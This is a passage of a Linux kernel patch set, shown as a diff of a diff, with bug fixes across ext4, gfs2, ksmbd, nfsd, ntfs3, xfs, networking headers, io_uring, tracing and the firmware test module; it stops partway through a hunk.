+@@ -1507,11 +1491,11 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ 
+ 	while (ce) {
+ 		ea_inode = ext4_iget(inode->i_sb, ce->e_value,
+-				     EXT4_IGET_NORMAL);
+-		if (!IS_ERR(ea_inode) &&
+-		    !is_bad_inode(ea_inode) &&
+-		    (EXT4_I(ea_inode)->i_flags & EXT4_EA_INODE_FL) &&
+-		    i_size_read(ea_inode) == value_len &&
++				     EXT4_IGET_EA_INODE);
++		if (IS_ERR(ea_inode))
++			goto next_entry;
++		ext4_xattr_inode_set_class(ea_inode);
++		if (i_size_read(ea_inode) == value_len &&
+ 		    !ext4_xattr_inode_read(ea_inode, ea_data, value_len) &&
+ 		    !ext4_xattr_inode_verify_hashes(ea_inode, NULL, ea_data,
+ 						    value_len) &&
+@@ -1521,9 +1505,8 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
+ 			kvfree(ea_data);
+ 			return ea_inode;
+ 		}
+-
+-		if (!IS_ERR(ea_inode))
+-			iput(ea_inode);
++		iput(ea_inode);
++	next_entry:
+ 		ce = mb_cache_entry_find_next(ea_inode_cache, ce);
+ 	}
+ 	kvfree(ea_data);
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 2015bd05cba10..9d27aa8bd2bc6 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -1380,6 +1380,14 @@ static void gfs2_evict_inode(struct inode *inode)
+ 	if (inode->i_nlink || sb_rdonly(sb))
+ 		goto out;
+ 
++	/*
++	 * In case of an incomplete mount, gfs2_evict_inode() may be called for
++	 * system files without having an active journal to write to.  In that
++	 * case, skip the filesystem evict.
++	 */
++	if (!sdp->sd_jdesc)
++		goto out;
++
+ 	gfs2_holder_mark_uninitialized(&gh);
+ 	ret = evict_should_delete(inode, &gh);
+ 	if (ret == SHOULD_DEFER_EVICTION)
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index c7466546e59be..cbfed03a1e5ce 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -157,13 +157,42 @@ static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
+ 	rcu_read_lock();
+ 	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
+ 					op_entry);
+-	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
+-		opinfo = NULL;
++	if (opinfo) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			opinfo = NULL;
++		else {
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				atomic_dec(&opinfo->refcount);
++				opinfo = NULL;
++			}
++		}
++	}
++
+ 	rcu_read_unlock();
+ 
+ 	return opinfo;
+ }
+ 
++static void opinfo_conn_put(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn;
++
++	if (!opinfo)
++		return;
++
++	conn = opinfo->conn;
++	/*
++	 * Checking waitqueue to dropping pending requests on
++	 * disconnection. waitqueue_active is safe because it
++	 * uses atomic operation for condition.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++	opinfo_put(opinfo);
++}
++
+ void opinfo_put(struct oplock_info *opinfo)
+ {
+ 	if (!atomic_dec_and_test(&opinfo->refcount))
+@@ -666,13 +695,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 
+ out:
+ 	ksmbd_free_work_struct(work);
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+ }
+ 
+ /**
+@@ -706,7 +728,6 @@ static int smb2_oplock_break_noti(struct oplock_info *opinfo)
+ 	work->conn = conn;
+ 	work->sess = opinfo->sess;
+ 
+-	atomic_inc(&conn->r_count);
+ 	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+ 		INIT_WORK(&work->work, __smb2_oplock_break_noti);
+ 		ksmbd_queue_work(work);
+@@ -776,13 +797,6 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 
+ out:
+ 	ksmbd_free_work_struct(work);
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+ }
+ 
+ /**
+@@ -822,7 +836,6 @@ static int smb2_lease_break_noti(struct oplock_info *opinfo)
+ 	work->conn = conn;
+ 	work->sess = opinfo->sess;
+ 
+-	atomic_inc(&conn->r_count);
+ 	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+ 		list_for_each_safe(tmp, t, &opinfo->interim_list) {
+ 			struct ksmbd_work *in_work;
+@@ -1144,8 +1157,10 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	}
+ 	prev_opinfo = opinfo_get_list(ci);
+ 	if (!prev_opinfo ||
+-	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx))
++	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
++		opinfo_conn_put(prev_opinfo);
+ 		goto set_lev;
++	}
+ 	prev_op_has_lease = prev_opinfo->is_lease;
+ 	if (prev_op_has_lease)
+ 		prev_op_state = prev_opinfo->o_lease->state;
+@@ -1153,19 +1168,19 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	if (share_ret < 0 &&
+ 	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+ 		err = share_ret;
+-		opinfo_put(prev_opinfo);
++		opinfo_conn_put(prev_opinfo);
+ 		goto err_out;
+ 	}
+ 
+ 	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+ 	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_put(prev_opinfo);
++		opinfo_conn_put(prev_opinfo);
+ 		goto op_break_not_needed;
+ 	}
+ 
+ 	list_add(&work->interim_entry, &prev_opinfo->interim_list);
+ 	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_put(prev_opinfo);
++	opinfo_conn_put(prev_opinfo);
+ 	if (err == -ENOENT)
+ 		goto set_lev;
+ 	/* Check all oplock was freed by close */
+@@ -1228,14 +1243,14 @@ static void smb_break_all_write_oplock(struct ksmbd_work *work,
+ 		return;
+ 	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+ 	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_put(brk_opinfo);
++		opinfo_conn_put(brk_opinfo);
+ 		return;
+ 	}
+ 
+ 	brk_opinfo->open_trunc = is_trunc;
+ 	list_add(&work->interim_entry, &brk_opinfo->interim_list);
+ 	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_put(brk_opinfo);
++	opinfo_conn_put(brk_opinfo);
+ }
+ 
+ /**
+@@ -1263,6 +1278,13 @@ void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
+ 		if (!atomic_inc_not_zero(&brk_op->refcount))
+ 			continue;
++
++		atomic_inc(&brk_op->conn->r_count);
++		if (ksmbd_conn_releasing(brk_op->conn)) {
++			atomic_dec(&brk_op->conn->r_count);
++			continue;
++		}
++
+ 		rcu_read_unlock();
+ 		if (brk_op->is_lease && (brk_op->o_lease->state &
+ 		    (~(SMB2_LEASE_READ_CACHING_LE |
+@@ -1292,7 +1314,7 @@ void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		brk_op->open_trunc = is_trunc;
+ 		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
+ next:
+-		opinfo_put(brk_op);
++		opinfo_conn_put(brk_op);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 7684b31035d93..01887570efe8a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -326,13 +326,9 @@ int smb2_set_rsp_credits(struct ksmbd_work *work)
+ 	if (hdr->Command == SMB2_NEGOTIATE)
+ 		aux_max = 1;
+ 	else
+-		aux_max = conn->vals->max_credits - credit_charge;
++		aux_max = conn->vals->max_credits - conn->total_credits;
+ 	credits_granted = min_t(unsigned short, credits_requested, aux_max);
+ 
+-	if (conn->vals->max_credits - conn->total_credits < credits_granted)
+-		credits_granted = conn->vals->max_credits -
+-			conn->total_credits;
+-
+ 	conn->total_credits += credits_granted;
+ 	work->credits_granted += credits_granted;
+ 
+@@ -865,13 +861,14 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+ 				  struct smb2_preauth_neg_context *pneg_ctxt,
+-				  int len_of_ctxts)
++				  int ctxt_len)
+ {
+ 	/*
+ 	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
+ 	 * which may not be present. Only check for used HashAlgorithms[1].
+ 	 */
+-	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++	if (ctxt_len <
++	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
+ 		return STATUS_INVALID_PARAMETER;
+ 
+ 	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+@@ -883,15 +880,23 @@ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+ 				struct smb2_encryption_neg_context *pneg_ctxt,
+-				int len_of_ctxts)
++				int ctxt_len)
+ {
+-	int cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
+-	int i, cphs_size = cph_cnt * sizeof(__le16);
++	int cph_cnt;
++	int i, cphs_size;
++
++	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
++		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
++		return;
++	}
+ 
+ 	conn->cipher_type = 0;
+ 
++	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
++	cphs_size = cph_cnt * sizeof(__le16);
++
+ 	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
+-	    len_of_ctxts) {
++	    ctxt_len) {
+ 		pr_err("Invalid cipher count(%d)\n", cph_cnt);
+ 		return;
+ 	}
+@@ -939,15 +944,22 @@ static void decode_compress_ctxt(struct ksmbd_conn *conn,
+ 
+ static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+ 				 struct smb2_signing_capabilities *pneg_ctxt,
+-				 int len_of_ctxts)
++				 int ctxt_len)
+ {
+-	int sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
+-	int i, sign_alos_size = sign_algo_cnt * sizeof(__le16);
++	int sign_algo_cnt;
++	int i, sign_alos_size;
++
++	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
++		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
++		return;
++	}
+ 
+ 	conn->signing_negotiated = false;
++	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
++	sign_alos_size = sign_algo_cnt * sizeof(__le16);
+ 
+ 	if (sizeof(struct smb2_signing_capabilities) + sign_alos_size >
+-	    len_of_ctxts) {
++	    ctxt_len) {
+ 		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
+ 		return;
+ 	}
+@@ -985,18 +997,16 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 	len_of_ctxts = len_of_smb - offset;
+ 
+ 	while (i++ < neg_ctxt_cnt) {
+-		int clen;
+-
+-		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
++		int clen, ctxt_len;
+ 
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+ 		clen = le16_to_cpu(pctx->DataLength);
+-		if (clen + sizeof(struct smb2_neg_context) > len_of_ctxts)
++		ctxt_len = clen + sizeof(struct smb2_neg_context);
++
++		if (ctxt_len > len_of_ctxts)
+ 			break;
+ 
+ 		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
+@@ -1007,7 +1017,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ 			status = decode_preauth_ctxt(conn,
+ 						     (struct smb2_preauth_neg_context *)pctx,
+-						     len_of_ctxts);
++						     ctxt_len);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+@@ -1018,7 +1028,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ 			decode_encrypt_ctxt(conn,
+ 					    (struct smb2_encryption_neg_context *)pctx,
+-					    len_of_ctxts);
++					    ctxt_len);
+ 		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
+ 			ksmbd_debug(SMB,
+ 				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
+@@ -1037,9 +1047,10 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
+ 			ksmbd_debug(SMB,
+ 				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
++
+ 			decode_sign_cap_ctxt(conn,
+ 					     (struct smb2_signing_capabilities *)pctx,
+-					     len_of_ctxts);
++					     ctxt_len);
+ 		}
+ 
+ 		/* offsets must be 8 byte aligned */
+@@ -1073,16 +1084,16 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 		return rc;
+ 	}
+ 
+-	if (req->DialectCount == 0) {
+-		pr_err("malformed packet\n");
++	smb2_buf_len = get_rfc1002_len(work->request_buf);
++	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
++	if (smb2_neg_size > smb2_buf_len) {
+ 		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+ 		rc = -EINVAL;
+ 		goto err_out;
+ 	}
+ 
+-	smb2_buf_len = get_rfc1002_len(work->request_buf);
+-	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
+-	if (smb2_neg_size > smb2_buf_len) {
++	if (req->DialectCount == 0) {
++		pr_err("malformed packet\n");
+ 		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+ 		rc = -EINVAL;
+ 		goto err_out;
+@@ -4371,21 +4382,6 @@ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+ 	return 0;
+ }
+ 
+-static unsigned long long get_allocation_size(struct inode *inode,
+-					      struct kstat *stat)
+-{
+-	unsigned long long alloc_size = 0;
+-
+-	if (!S_ISDIR(stat->mode)) {
+-		if ((inode->i_blocks << 9) <= stat->size)
+-			alloc_size = stat->size;
+-		else
+-			alloc_size = inode->i_blocks << 9;
+-	}
+-
+-	return alloc_size;
+-}
+-
+ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 				   struct ksmbd_file *fp, void *rsp_org)
+ {
+@@ -4400,7 +4396,7 @@ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+ 	delete_pending = ksmbd_inode_pending_delete(fp);
+ 
+-	sinfo->AllocationSize = cpu_to_le64(get_allocation_size(inode, &stat));
++	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+ 	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
+ 	sinfo->DeletePending = delete_pending;
+@@ -4465,7 +4461,7 @@ static int get_file_all_info(struct ksmbd_work *work,
+ 	file_info->Attributes = fp->f_ci->m_fattr;
+ 	file_info->Pad1 = 0;
+ 	file_info->AllocationSize =
+-		cpu_to_le64(get_allocation_size(inode, &stat));
++		cpu_to_le64(inode->i_blocks << 9);
+ 	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	file_info->NumberOfLinks =
+ 			cpu_to_le32(get_nlink(&stat) - delete_pending);
+@@ -4654,7 +4650,7 @@ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->ChangeTime = cpu_to_le64(time);
+ 	file_info->Attributes = fp->f_ci->m_fattr;
+ 	file_info->AllocationSize =
+-		cpu_to_le64(get_allocation_size(inode, &stat));
++		cpu_to_le64(inode->i_blocks << 9);
+ 	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	file_info->Reserved = cpu_to_le32(0);
+ 	rsp->OutputBufferLength =
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index dc74a947a440c..573de0d49e172 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -710,16 +710,11 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	if (err != 0 || fd < 0)
+ 		return -EINVAL;
+ 
+-	if (svc_alien_sock(net, fd)) {
+-		printk(KERN_ERR "%s: socket net is different to NFSd's one\n", __func__);
+-		return -EINVAL;
+-	}
+-
+ 	err = nfsd_create_serv(net);
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_addsock(nn->nfsd_serv, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
++	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+ 	if (err >= 0 &&
+ 	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index dc3ba13546dd6..155b34c4683c2 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -469,7 +469,15 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 
+ 	inode_lock(inode);
+ 	for (retries = 1;;) {
+-		host_err = __nfsd_setattr(dentry, iap);
++		struct iattr attrs;
++
++		/*
++		 * notify_change() can alter its iattr argument, making
++		 * @iap unsuitable for submission multiple times. Make a
++		 * copy for every loop iteration.
++		 */
++		attrs = *iap;
++		host_err = __nfsd_setattr(dentry, &attrs);
+ 		if (host_err != -EAGAIN || !retries--)
+ 			break;
+ 		if (!nfsd_wait_for_delegreturn(rqstp, inode))
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 57988fedd1847..e52dfa5c7562c 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -98,6 +98,12 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 	/* Record should contain $I30 root. */
+ 	is_dir = rec->flags & RECORD_FLAG_DIR;
+ 
++	/* MFT_REC_MFT is not a dir */
++	if (is_dir && ino == MFT_REC_MFT) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	inode->i_generation = le16_to_cpu(rec->seq);
+ 
+ 	/* Enumerate all struct Attributes MFT. */
+diff --git a/fs/xfs/xfs_buf_item_recover.c b/fs/xfs/xfs_buf_item_recover.c
+index ffa94102094d9..43167f543afc3 100644
+--- a/fs/xfs/xfs_buf_item_recover.c
++++ b/fs/xfs/xfs_buf_item_recover.c
+@@ -943,6 +943,16 @@ xlog_recover_buf_commit_pass2(
+ 	if (lsn && lsn != -1 && XFS_LSN_CMP(lsn, current_lsn) >= 0) {
+ 		trace_xfs_log_recover_buf_skip(log, buf_f);
+ 		xlog_recover_validate_buf_type(mp, bp, buf_f, NULLCOMMITLSN);
++
++		/*
++		 * We're skipping replay of this buffer log item due to the log
++		 * item LSN being behind the ondisk buffer.  Verify the buffer
++		 * contents since we aren't going to run the write verifier.
++		 */
++		if (bp->b_ops) {
++			bp->b_ops->verify_read(bp);
++			error = bp->b_error;
++		}
+ 		goto out_release;
+ 	}
+ 
+diff --git a/include/linux/sunrpc/svcsock.h b/include/linux/sunrpc/svcsock.h
+index bcc555c7ae9c6..13aff355d5a13 100644
+--- a/include/linux/sunrpc/svcsock.h
++++ b/include/linux/sunrpc/svcsock.h
+@@ -59,10 +59,9 @@ int		svc_recv(struct svc_rqst *, long);
+ int		svc_send(struct svc_rqst *);
+ void		svc_drop(struct svc_rqst *);
+ void		svc_sock_update_bufs(struct svc_serv *serv);
+-bool		svc_alien_sock(struct net *net, int fd);
+-int		svc_addsock(struct svc_serv *serv, const int fd,
+-					char *name_return, const size_t len,
+-					const struct cred *cred);
++int		svc_addsock(struct svc_serv *serv, struct net *net,
++			    const int fd, char *name_return, const size_t len,
++			    const struct cred *cred);
+ void		svc_init_xprt_sock(void);
+ void		svc_cleanup_xprt_sock(void);
+ struct svc_xprt *svc_sock_create(struct svc_serv *serv, int prot);
+diff --git a/include/media/dvb_net.h b/include/media/dvb_net.h
+index 5e31d37f25fac..cc01dffcc9f35 100644
+--- a/include/media/dvb_net.h
++++ b/include/media/dvb_net.h
+@@ -41,6 +41,9 @@
+  * @exit:		flag to indicate when the device is being removed.
+  * @demux:		pointer to &struct dmx_demux.
+  * @ioctl_mutex:	protect access to this struct.
++ * @remove_mutex:	mutex that avoids a race condition between a callback
++ *			called when the hardware is disconnected and the
++ *			file_operations of dvb_net.
+  *
+  * Currently, the core supports up to %DVB_NET_DEVICES_MAX (10) network
+  * devices.
+@@ -53,6 +56,7 @@ struct dvb_net {
+ 	unsigned int exit:1;
+ 	struct dmx_demux *demux;
+ 	struct mutex ioctl_mutex;
++	struct mutex remove_mutex;
+ };
+ 
+ /**
+diff --git a/include/media/dvbdev.h b/include/media/dvbdev.h
+index ac60c9fcfe9a6..34b01ebf32828 100644
+--- a/include/media/dvbdev.h
++++ b/include/media/dvbdev.h
+@@ -189,6 +189,21 @@ struct dvb_device {
+ 	void *priv;
+ };
+ 
++/**
++ * struct dvbdevfops_node - fops nodes registered in dvbdevfops_list
++ *
++ * @fops:		Dynamically allocated fops for ->owner registration
++ * @type:		type of dvb_device
++ * @template:		dvb_device used for registration
++ * @list_head:		list_head for dvbdevfops_list
++ */
++struct dvbdevfops_node {
++	struct file_operations *fops;
++	enum dvb_device_type type;
++	const struct dvb_device *template;
++	struct list_head list_head;
++};
++
+ /**
+  * dvb_device_get - Increase dvb_device reference
+  *
+diff --git a/include/net/sock.h b/include/net/sock.h
+index beb1b747fb09d..f11b98bd0244c 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -333,6 +333,7 @@ struct sk_filter;
+   *	@sk_cgrp_data: cgroup data for this cgroup
+   *	@sk_memcg: this socket's memory cgroup association
+   *	@sk_write_pending: a write to stream socket waits to start
++  *	@sk_wait_pending: number of threads blocked on this socket
+   *	@sk_state_change: callback to indicate change in the state of the sock
+   *	@sk_data_ready: callback to indicate there is data to be processed
+   *	@sk_write_space: callback to indicate there is bf sending space available
+@@ -425,6 +426,7 @@ struct sock {
+ 	unsigned int		sk_napi_id;
+ #endif
+ 	int			sk_rcvbuf;
++	int			sk_wait_pending;
+ 
+ 	struct sk_filter __rcu	*sk_filter;
+ 	union {
+@@ -1170,6 +1172,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 
+ #define sk_wait_event(__sk, __timeo, __condition, __wait)		\
+ 	({	int __rc;						\
++		__sk->sk_wait_pending++;				\
+ 		release_sock(__sk);					\
+ 		__rc = __condition;					\
+ 		if (!__rc) {						\
+@@ -1179,6 +1182,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 		}							\
+ 		sched_annotate_sleep();					\
+ 		lock_sock(__sk);					\
++		__sk->sk_wait_pending--;				\
+ 		__rc = __condition;					\
+ 		__rc;							\
+ 	})
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 0744717f5caa7..5eedd476a38d7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -632,6 +632,7 @@ void tcp_reset(struct sock *sk, struct sk_buff *skb);
+ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, struct sk_buff *skb);
+ void tcp_fin(struct sock *sk);
+ void tcp_check_space(struct sock *sk);
++void tcp_sack_compress_send_ack(struct sock *sk);
+ 
+ /* tcp_timer.c */
+ void tcp_init_xmit_timers(struct sock *);
+diff --git a/io_uring/epoll.c b/io_uring/epoll.c
+index 9aa74d2c80bc4..89bff2068a190 100644
+--- a/io_uring/epoll.c
++++ b/io_uring/epoll.c
+@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
+ 
+-	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
+-		     "be removed in a future Linux kernel version.\n",
+-		     current->comm);
+-
+ 	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 2b2120ed2460f..75244d9e2bf9a 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -4193,13 +4193,19 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
+-	/* Some types cannot be a value */
+-	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
+-				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
+-				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
+-				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
+-		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
+-		ret = -EINVAL;
++	/* values and variables should not have some modifiers */
++	if (hist_field->flags & HIST_FIELD_FL_VAR) {
++		/* Variable */
++		if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++					 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2))
++			goto err;
++	} else {
++		/* Value */
++		if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++					 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++					 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++					 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE))
++			goto err;
+ 	}
+ 
+ 	hist_data->fields[val_idx] = hist_field;
+@@ -4211,6 +4217,9 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		ret = -EINVAL;
+  out:
+ 	return ret;
++ err:
++	hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++	return -EINVAL;
+ }
+ 
+ static int create_val_field(struct hist_trigger_data *hist_data,
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 689361097bb0c..26111b0ca1da3 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1595,6 +1595,8 @@ static enum hrtimer_restart timerlat_irq(struct hrtimer *timer)
+ 			osnoise_stop_tracing();
+ 			notify_new_max_latency(diff);
+ 
++			wake_up_process(tlat->kthread);
++
+ 			return HRTIMER_NORESTART;
+ 		}
+ 	}
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index de38f1c037762..3d731aac94d49 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -302,7 +302,7 @@ trace_probe_primary_from_call(struct trace_event_call *call)
+ {
+ 	struct trace_probe_event *tpe = trace_probe_event_from_call(call);
+ 
+-	return list_first_entry(&tpe->probes, struct trace_probe, list);
++	return list_first_entry_or_null(&tpe->probes, struct trace_probe, list);
+ }
+ 
+ static inline struct list_head *trace_probe_probe_list(struct trace_probe *tp)
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 1c5a2adb16ef5..7f165c517338a 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -44,6 +44,7 @@ struct test_batched_req {
+ 	bool sent;
+ 	const struct firmware *fw;
+ 	const char *name;
++	const char *fw_buf;
+ 	struct completion completion;
+ 	struct task_struct *task;
+ 	struct device *dev;
+@@ -174,8 +175,14 @@ static void __test_release_all_firmware(void)
+ 
+ 	for (i = 0; i < test_fw_config->num_requests; i++) {
+ 		req = &test_fw_config->reqs[i];
+-		if (req->fw)
++		if (req->fw) {
++			if (req->fw_buf) {
++				kfree_const(req->fw_buf);
++				req->fw_buf = NULL;
++			}
+ 			release_firmware(req->fw);
++			req->fw = NULL;
++		}
+ 	}
+ 
+ 	vfree(test_fw_config->reqs);
+@@ -651,6 +658,8 @@ static ssize_t trigger_request_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	test_firmware = NULL;
+ 	rc = request_firmware(&test_firmware, name, dev);
+ 	if (rc) {
+@@ -751,6 +760,8 @@ static ssize_t trigger_async_request_store(struct device *dev,
